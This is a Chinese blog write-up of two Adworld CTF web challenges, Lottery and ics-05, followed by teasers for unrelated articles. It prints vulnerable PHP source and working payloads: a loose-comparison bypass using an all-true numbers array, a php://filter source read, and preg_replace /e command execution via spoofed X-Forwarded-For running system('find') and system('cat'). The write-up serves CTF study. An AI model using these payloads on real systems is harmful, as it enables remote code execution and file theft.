双剑破天门:攻防世界Web题解之独孤九剑心法(十)

优质文章学习记录

8 min read
双剑破天门:攻防世界Web题解之独孤九剑心法(十)

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任

**本文以攻防世界部分题为例进行演示,后续会对攻防世界大部分的web题目进行演示,如果你感兴趣请关注**

目录

一:Lottery

二:ics-05

三:总结

一:Lottery

打开后发现这个靶场加载异常缓慢,然后他还给了源码,我们先不看源码先熟悉一下这个网站是什么

这应该是一个类似猜数字游戏,选对7个号码即可得到相应奖励

然后注册

随便输入7个数字发现一个也没中,白费2元

然后我们随便点击这个网站的功能发现如果想要flag需要有相对应的余额

我们这会的思路就是利用bp抓包看看能不能修改我们的余额

好像成功了,我们试一试能不能换flag

居然说没有足够的钱,这个方法不行只要将页面上的数字修改只要刷新就会变回原来的余额

居然不能修改余额那就看看在猜数字的页面有没有突破口,发现其访问了api.php我们继续代码审计

看到如下核心代码,首先随机生成七位数字(random_win_nums)然后将其赋值给$win_number。随后关键点就是他使用的是两个等号来判断我们传入的数字和随机生成的数字,既然这样那直接可以利用true绕过,因为不检查类型

代码如下

//部分代码 function random_num(){ do { $byte = openssl_random_pseudo_bytes(10, $cstrong); $num = ord($byte); } while ($num >= 250); if(!$cstrong){ response_error('server need be checked, tell admin'); } $num /= 25; return strval(floor($num)); } function random_win_nums(){ $result = ''; for($i=0; $i<7; $i++){ $result .= random_num(); } return $result; } function buy($req){ require_registered(); require_min_money(2); $money = $_SESSION['money']; $numbers = $req['numbers']; $win_numbers = random_win_nums(); $same_count = 0; for($i=0; $i<7; $i++){ if($numbers[$i] == $win_numbers[$i]){ $same_count++; } } switch ($same_count) { case 2: $prize = 5; break; case 3: $prize = 20; break; case 4: $prize = 300; break; case 5: $prize = 1800; break; case 6: $prize = 200000; break; case 7: $prize = 5000000; break; default: $prize = 0; break; } $money += $prize - 2; $_SESSION['money'] = $money; response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]); }

抓到其流量包我们拦截回应包修改

利用php的弱类型比较

直接将numbers字段改为[true,true,true,true,true,true,true]

成功利用弱类型得到奖金

成功拿到flag

二:ics-05

打开如下所示

随便点击发现只有此页面可打开,但是好像什么都没有,我们打开页面源代码查看一下

发现一个href可点

打开如下,好像没什么特别的

我们修改其为index.php回显ok,既然这样那么如果我们能够读取到这个index.php应该就可以拿到flag

读取文件使用伪协议

php://filter/read=convert.base64-encode/resource=index.php

复制这个base64然后解密

打开代码后观察如下代码

如果ip为127.0.0.1就是admin,然后还有一个preg_replace方法,pattern第一个参数的结尾包含了/e修正符的话,第二个参数就会被当做php代码执行

打开bp,修改ip后为admin

然后添加三个参数

?pat=/heihei/e&rep=system('find+-name+*flag*')&sub=heihei

需要使用+置换空格 得到flag.php

成功拿到flag但注意flag不在页面渲染中显示

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

解密后的index.php代码

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?> <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="layui/css/layui.css" media="all"> <title>设备维护中心</title> <meta charset="utf-8"> </head> <body> <ul> <li><a href="?page=index">云平台设备维护中心</a></li> </ul> <fieldset> <legend>设备列表</legend> </fieldset> <table></table> <script type="text/html"> <!-- 这里的 checked 的状态只是演示 --> <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}> </script> <script src="layui/layui.js" charset="utf-8"></script> <script> layui.use('table', function() { var table = layui.table, form = layui.form; table.render({ elem: '#test', url: '/somrthing.json', cellMinWidth: 80, cols: [ [ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ] ], page: true }); }); </script> <script> layui.use('element', function() { var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块 //监听导航点击 element.on('nav(demo)', function(elem) { //console.log(elem) layer.msg(elem.text()); }); }); </script> <?php $page = $_GET[page]; if (isset($page)) { if (ctype_alnum($page)) { ?> <br /><br /><br /><br /> <div> <p><?php echo $page; die();?></p> <br /><br /><br /><br /> <?php }else{ ?> <br /><br /><br /><br /> <div> <p> <?php if (strpos($page, 'input') > 0) { die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?> </p> <br /><br /><br /><br /> <?php }} //方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br >Welcome My Admin ! <br >"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?> </body> </html>

三:总结

本文通过攻防世界中的两个Web题目(Lottery和ics-05)演示了如何利用代码审计和漏洞挖掘技术获取flag。在Lottery题目中,通过分析网站的猜数字游戏功能,发现使用PHP的弱类型比较漏洞,成功绕过验证并获取奖金和flag。在ics-05题目中,通过修改IP地址和利用PHP的preg_replace函数执行系统命令,成功读取并解密index.php文件,最终获取flag。

(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

Read more

前端通用 Token 全流程操作指南(常见常用版)

前端通用 Token 全流程操作指南(常见常用版) 本文梳理 所有前端框架通用 的 Token 操作逻辑,剥离具体项目/技术栈细节,聚焦「获取→存储→使用→过期→清除」的核心生命周期,每个步骤均标注「通用场景+通用方案+注意事项」,适合所有前端开发场景,可直接作为开发速查表。 前置说明:Token 的核心定位 Token 是后端签发的临时访问凭证,核心作用是: 1. 证明“当前用户是谁”(身份认证); 2. 证明“当前用户有权限访问”(权限校验)。 一、第一步:登录成功获取 Token 通用场景 用户通过账号密码/验证码/第三方登录等方式,向后端发起登录请求,后端验证通过后,在响应体中返回 Token。

前端权限管理实现:别让用户看到不该看的东西!

前端权限管理实现:别让用户看到不该看的东西! 毒舌时刻 权限管理?听起来就像是前端工程师为了显得自己很专业而特意搞的一套复杂流程。你以为随便加个if语句就能实现权限管理?别做梦了!到时候你会发现,权限逻辑分散在各个组件中,难以维护。 你以为前端权限管理就是最终的安全保障?别天真了!前端权限管理只是为了提高用户体验,真正的安全保障在后端。还有那些所谓的权限管理库,看起来高大上,用起来却各种问题。 为什么你需要这个 1. 用户体验:良好的权限管理可以为不同角色的用户提供不同的界面,提高用户体验。 2. 安全性:前端权限管理可以防止用户访问不该访问的功能,提高应用的安全性。 3. 代码组织:集中的权限管理可以使代码结构更清晰,便于维护。 4. 可扩展性:良好的权限管理设计可以方便地添加新的角色和权限。 5. 合规性:某些行业和地区要求应用必须实现严格的权限控制。 反面教材 // 1. 分散的权限逻辑 function AdminPanel() { const user = useUser(); if (user.role !== 'admin'

Qwen3-VL-WEBUI交错MRoPE应用:长视频推理部署实战

Qwen3-VL-WEBUI交错MRoPE应用:长视频推理部署实战 1. 引言:为何需要长视频理解的视觉语言模型 随着多模态AI在智能助手、自动化代理和内容分析等场景中的广泛应用,传统大语言模型(LLM)已无法满足对复杂视觉-时间序列数据的理解需求。尤其是在监控分析、教育视频摘要、影视内容检索和自动化GUI操作等任务中,系统不仅需要“看懂”画面内容,还需理解长时间跨度下的事件演变逻辑。 阿里云最新推出的 Qwen3-VL-WEBUI 正是为解决这一挑战而生。它基于开源项目 Qwen3-VL 系列构建,内置 Qwen3-VL-4B-Instruct 模型,专为长上下文视频理解与交互式推理优化。其核心创新之一——交错MRoPE(Multidimensional Rotary Position Embedding)机制,使得模型能够在不损失精度的前提下处理长达数小时的视频流,并实现秒级事件定位与因果推理。 本文将围绕 Qwen3-VL-WEBUI 的实际部署与长视频推理能力展开,重点解析: - 交错MRoPE如何提升时空建模能力 - 如何通过WEBUI快速部署并进行视频理解测试 -
Modbus数据采集 Web 平台介绍

Modbus数据采集 Web 平台介绍

自己搭建的Modbus Web模拟,为了实时监控modbus的数据以及创建modbus的tcp/rtu的模拟服务器框架,方便自娱自乐的数据操作平台。感兴趣的话,可以去开源的项目地址: 前端项目:https://github.com/feiyuluoye/mutil-modbus-frontend 后端还需要优化一些数据,modbus rtu 服务器自动模拟数据发送的功能还未实现,目前只实现了modbus tcp的模拟数据自动发送功能,待实现基础rtu自动发送自动接收之后,再贴出来。modbus客户端支持接收外部或者自身模拟的tcp/rtu服务端的数据。 一、首页 / 概述 1.1 英雄区域(Hero) 主标题 Data Collector Web – 让工业数据采集「看得见、配得快、管得住」。 副标题 / 标语 一站式 Modbus TCP/RTU 数据采集与告警平台,从设备到数据,只需几分钟。 视觉建议 * 仪表盘截图,包含: